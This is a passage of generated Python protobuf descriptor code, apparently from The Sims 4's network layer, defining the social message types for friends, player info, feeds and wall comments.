full_name='EA.Sims4.Network.SocialClusterMessageType',
filename=None,
file=DESCRIPTOR,
values=[
descriptor.EnumValueDescriptor(name='SOC_LOGIN',
index=0,
number=0,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_LOGOFF',
index=1,
number=1,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_PRESENCEUPDATE',
index=2,
number=2,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_FEEDUPDATE',
index=3,
number=3,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_ADD_FEEDSUB',
index=4,
number=4,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_REMOVE_FEEDSUB',
index=5,
number=5,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_BROADCAST_PRIVOP',
index=6,
number=6,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_BROADCAST_QUEUED',
index=7,
number=8,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_BROADCAST_CACHE_INVALIDATE',
index=8,
number=9,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_REST_USER_REGISTER',
index=9,
number=10,
options=None,
type=None)],
containing_type=None,
options=None,
serialized_start=6856,
serialized_end=7118)
SFI_ITEM_DOWNLOADED = 0
SFI_ITEM_UPLOADED = 1
SFI_ITEM_FAVORITED = 2
SFI_ITEM_COMMENTED = 3
SFI_ITEM_SHOWCASED = 4
SFI_PROFILE_COMMENTED = 5
SFI_NEW_FOLLOWERS = 6
SOC_LOGIN = 0
SOC_LOGOFF = 1
SOC_PRESENCEUPDATE = 2
SOC_FEEDUPDATE = 3
SOC_ADD_FEEDSUB = 4
SOC_REMOVE_FEEDSUB = 5
SOC_BROADCAST_PRIVOP = 6
SOC_BROADCAST_QUEUED = 8
SOC_BROADCAST_CACHE_INVALIDATE = 9
SOC_REST_USER_REGISTER = 10
_SOCIALFRIENDMSG = descriptor.Descriptor(name='SocialFriendMsg',
full_name='EA.Sims4.Network.SocialFriendMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='simId',
full_name='EA.Sims4.Network.SocialFriendMsg.simId',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialFriendMsg.nucleusid',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='note',
full_name='EA.Sims4.Network.SocialFriendMsg.note',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='prefix',
full_name='EA.Sims4.Network.SocialFriendMsg.prefix',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='persona',
full_name='EA.Sims4.Network.SocialFriendMsg.persona',
index=4,
number=5,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='cheatForce',
full_name='EA.Sims4.Network.SocialFriendMsg.cheatForce',
index=5,
number=6,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=112,
serialized_end=230)
_SOCIALPERSONARESPONSEMSG = descriptor.Descriptor(name='SocialPersonaResponseMsg',
full_name='EA.Sims4.Network.SocialPersonaResponseMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='personas',
full_name='EA.Sims4.Network.SocialPersonaResponseMsg.personas',
index=0,
number=1,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=232,
serialized_end=276)
_SOCIALGENERICRESPONSE = descriptor.Descriptor(name='SocialGenericResponse',
full_name='EA.Sims4.Network.SocialGenericResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='error',
full_name='EA.Sims4.Network.SocialGenericResponse.error',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='msg_type',
full_name='EA.Sims4.Network.SocialGenericResponse.msg_type',
index=1,
number=2,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='postId',
full_name='EA.Sims4.Network.SocialGenericResponse.postId',
index=2,
number=3,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='postParentId',
full_name='EA.Sims4.Network.SocialGenericResponse.postParentId',
index=3,
number=4,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=278,
serialized_end=405)
_SOCIALPLAYERINFOLIST_PLAYERINFO = descriptor.Descriptor(name='PlayerInfo',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='AccountName',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.AccountName',
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='AccountNotes',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.AccountNotes',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='presence',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.presence',
index=2,
number=3,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='OnlineStatus2',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.OnlineStatus2',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='NucleusId',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.NucleusId',
index=4,
number=9,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='PlayerBio',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.PlayerBio',
index=5,
number=10,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='exclude_reported',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.exclude_reported',
index=6,
number=11,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='IsUserBlocked',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.IsUserBlocked',
index=7,
number=12,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=501,
serialized_end=724)
_SOCIALPLAYERINFOLIST = descriptor.Descriptor(name='SocialPlayerInfoList',
full_name='EA.Sims4.Network.SocialPlayerInfoList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='players',
full_name='EA.Sims4.Network.SocialPlayerInfoList.players',
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[
_SOCIALPLAYERINFOLIST_PLAYERINFO],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=408,
serialized_end=724)
_SOCIALSEARCHMSG = descriptor.Descriptor(name='SocialSearchMsg',
full_name='EA.Sims4.Network.SocialSearchMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='prefix',
full_name='EA.Sims4.Network.SocialSearchMsg.prefix',
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='search_results',
full_name='EA.Sims4.Network.SocialSearchMsg.search_results',
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=726,
serialized_end=823)
_ORIGINERRORMESSAGE = descriptor.Descriptor(name='OriginErrorMessage',
full_name='EA.Sims4.Network.OriginErrorMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='errorcode',
full_name='EA.Sims4.Network.OriginErrorMessage.errorcode',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='errormessage',
full_name='EA.Sims4.Network.OriginErrorMessage.errormessage',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=825,
serialized_end=886)
_SOCIALINVITERESPONSEMESSAGE = descriptor.Descriptor(name='SocialInviteResponseMessage',
full_name='EA.Sims4.Network.SocialInviteResponseMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='invitationid',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.invitationid',
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='invitationtype',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.invitationtype',
index=1,
number=2,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='inviternucleusid',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.inviternucleusid',
index=2,
number=3,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='accepternucleusid',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.accepternucleusid',
index=3,
number=4,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='actionSuccess',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.actionSuccess',
index=4,
number=5,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=889,
serialized_end=1040)
_SOCIALCASSANDRATEST = descriptor.Descriptor(name='SocialCassandraTest',
full_name='EA.Sims4.Network.SocialCassandraTest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='opcode',
full_name='EA.Sims4.Network.SocialCassandraTest.opcode',
index=0,
number=1,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1042,
serialized_end=1116)
_SOCIALFRIENDLISTREQUESTMESSAGE = descriptor.Descriptor(name='SocialFriendListRequestMessage',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='account_id',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.account_id',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='friend_id',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.friend_id',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='address_str',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.address_str',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='object_str',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.object_str',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='reply_proxy_id',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.reply_proxy_id',
index=4,
number=5,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1119,
serialized_end=1255)
_SOCIALREQUESTNUCLEUSIDFROMPERSONA = descriptor.Descriptor(name='SocialRequestNucleusIdFromPersona',
full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='requestid',
full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.requestid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='personaName',
full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.personaName',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='message_id',
full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.message_id',
index=2,
number=3,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1257,
serialized_end=1352)
_SOCIALNUCLEUSIDFROMPERSONARESPONSE = descriptor.Descriptor(name='SocialNucleusIdFromPersonaResponse',
full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='requestid',
full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.requestid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.nucleusid',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='message_id',
full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.message_id',
index=2,
number=3,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1354,
serialized_end=1448)
_SOCIALEXCHANGEMESSAGE = descriptor.Descriptor(name='SocialExchangeMessage',
full_name='EA.Sims4.Network.SocialExchangeMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='envelope',
full_name='EA.Sims4.Network.SocialExchangeMessage.envelope',
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1450,
serialized_end=1533)
_SOCIALFOLLOWERSMESSAGE = descriptor.Descriptor(name='SocialFollowersMessage',
full_name='EA.Sims4.Network.SocialFollowersMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='sfim_blob',
full_name='EA.Sims4.Network.SocialFollowersMessage.sfim_blob',
index=0,
number=1,
type=12,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1535,
serialized_end=1578)
_SOCIALFEEDITEMMESSAGE = descriptor.Descriptor(name='SocialFeedItemMessage',
full_name='EA.Sims4.Network.SocialFeedItemMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='feed_id',
full_name='EA.Sims4.Network.SocialFeedItemMessage.feed_id',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='feed_type',
full_name='EA.Sims4.Network.SocialFeedItemMessage.feed_type',
index=1,
number=2,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='metadata',
full_name='EA.Sims4.Network.SocialFeedItemMessage.metadata',
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialFeedItemMessage.nucleusid',
index=3,
number=4,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='persona',
full_name='EA.Sims4.Network.SocialFeedItemMessage.persona',
index=4,
number=5,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='quantity',
full_name='EA.Sims4.Network.SocialFeedItemMessage.quantity',
index=5,
number=6,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='follower_nucleusid',
full_name='EA.Sims4.Network.SocialFeedItemMessage.follower_nucleusid',
index=6,
number=7,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='follower_persona',
full_name='EA.Sims4.Network.SocialFeedItemMessage.follower_persona',
index=7,
number=8,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='followers_blob',
full_name='EA.Sims4.Network.SocialFeedItemMessage.followers_blob',
index=8,
number=9,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='is_maxis_curated',
full_name='EA.Sims4.Network.SocialFeedItemMessage.is_maxis_curated',
index=9,
number=10,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1581,
serialized_end=1928)
_SOCIALFEEDITEMUNSERIALIZEDMESSAGE = descriptor.Descriptor(name='SocialFeedItemUnserializedMessage',
full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='feed_id',
full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.feed_id',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='data',
full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.data',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='count_override',
full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.count_override',
index=2,
number=3,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1930,
serialized_end=2020)
_SOCIALWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialWallCommentMessage',
full_name='EA.Sims4.Network.SocialWallCommentMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='uuid',
full_name='EA.Sims4.Network.SocialWallCommentMessage.uuid',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='author_id',
full_name='EA.Sims4.Network.SocialWallCommentMessage.author_id',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='author_persona',
full_name='EA.Sims4.Network.SocialWallCommentMessage.author_persona',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='message',
full_name='EA.Sims4.Network.SocialWallCommentMessage.message',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2022,
serialized_end=2122)
_SOCIALGETWALLCOMMENTSMESSAGE = descriptor.Descriptor(name='SocialGetWallCommentsMessage',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='gallery_id',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.gallery_id',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='starting_uuid',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.starting_uuid',
index=2,
number=3,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='num_results',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.num_results',
index=3,
number=4,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='messages',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.messages',
index=4,
number=5,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='hidden',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.hidden',
index=5,
number=6,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='exclude_reported',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.exclude_reported',
index=6,
number=7,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2125,
serialized_end=2342)
_SOCIALPOSTWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialPostWallCommentMessage',
full_name='EA.Sims4.Network.SocialPostWallCommentMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialPostWallCommentMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='gallery_id',
full_name='EA.Sims4.Network.SocialPostWallCommentMessage.gallery_id',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='message',
full_name='EA.Sims4.Network.SocialPostWallCommentMessage.message',
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2345,
serialized_end=2475)
_SOCIALDELETEWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialDeleteWallCommentMessage',
full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
